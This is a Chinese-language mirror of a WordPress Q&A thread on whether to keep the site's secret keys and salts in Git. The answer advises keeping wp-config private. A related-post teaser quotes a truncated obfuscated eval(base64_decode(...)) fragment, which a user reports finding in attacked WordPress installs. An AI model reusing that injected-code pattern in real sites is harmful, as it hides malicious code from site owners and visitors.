Secret keys in SCM

时间：2013-08-16 作者：Till

我在Git存储库中安装了WordPress，我想知道8 "secret keys" 存储在那里，或者我是否应该在部署期间插入它们。

1 个回复

最合适的回答,由SO网友:Stephen Harris 整理而成

您的配置文件不应该是公共的。除了8盐WordPress之外，它还包括您的数据库凭据。（仅使用密钥就可以在一周内强行登录：http://codeseekah.com/2012/04/09/why-wordpress-authentication-unique-keys-and-salts-are-important/)

结束

标签： security wp-config deployment 小码农

Wp-config.php的默认安装权限

最近我注意到，我们在服务器上安装的许多wordpress都受到了这种东西的攻击和攻击eval(base64_decode(\"DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRy

URL中的“do_wp_cron”，即使备用Cron不在wp-config中
将wp-config.php上移2级
Wp-config.php文件权限
Wp-config文件有多安全？
在wp-config.php中更改WP_CONTENT_DIR和WP_CONTENT_URL是否未注册？
Security and Must Use Plugins
将其他网络常量动态添加到wp-config.php
就多站点的wp-config.php if语句征求您的意见
如何在wp-config中创建自定义变量

小码农CODE

Secret keys in SCM

相关推荐

Wp-config.php的默认安装权限